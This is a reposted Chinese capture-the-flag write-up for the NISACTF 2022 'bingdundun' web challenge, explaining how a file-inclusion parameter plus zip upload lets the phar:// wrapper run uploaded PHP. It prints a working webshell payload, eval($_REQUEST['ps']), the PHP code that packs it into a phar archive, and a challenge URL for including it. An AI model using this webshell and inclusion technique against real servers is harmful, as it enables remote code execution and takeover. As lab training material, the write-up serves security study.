0


[NISACTF 2022]bingdundun

  1. 进入靶场环境,提示upload,应该是一个文件上传与文件包含相关的题目。

  1. 点击upload进入文件上传页面。看到url有一个bingdundun的get传参,我们尝试传入其他值尝试一下。

  1. 尝试传入index,发现index页面的内容被大量包含进来,并且会自动在后面添加.php

  1. 在看文件上传点提示可以传图片或压缩包,因此考虑php伪协议中的phar协议或zip协议。首先写一个phpinfo()脚本,打成zip压缩包并上传,上传成功后利用phar协议包含压缩包中的脚本文件,发现脚本中的php代码被成功包含进来并被当作代码执行了。

获取flag方法

方法一:

利用phar协议读取上传一句话木马,用菜刀链接。

http://1.14.71.254:28884/?bingdundun=phar://23de81832e6ba264115a6192202105f7.zip/reqma

方法二:

构造phar文件,phar文件包含我们想要执行的代码,由于index页面提示,flag就在根目录下,因此如果能直接执行cat /flag 就能出结果了。

构造phar文件方法

  1. 修改php.ini 让phar.readonly 改成off。
  2. 创建一个pharfile.php文件,代码如下,用于生成phar包
<?php
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("pharfile.php", '<?php eval($_REQUEST["ps"]);?>');
$phar->stopBuffering();
?>
  1. 浏览器访问该文件,在同目录下会生成exp.phar文件。复制一份改成zip格式,然后上传

  1. phar://协议将文件包含到当前页面,然后给ps参数传入想要执行的代码值,执行成功。

  1. 根据代码提示flag在根目录下,因此构造url得到flag。

标签: 安全 web安全

本文转载自: https://blog.csdn.net/jhk8698/article/details/127406643
版权归原作者 堃啊方方土 所有, 如有侵权,请联系我们删除。

“[NISACTF 2022]bingdundun”的评论:

还没有评论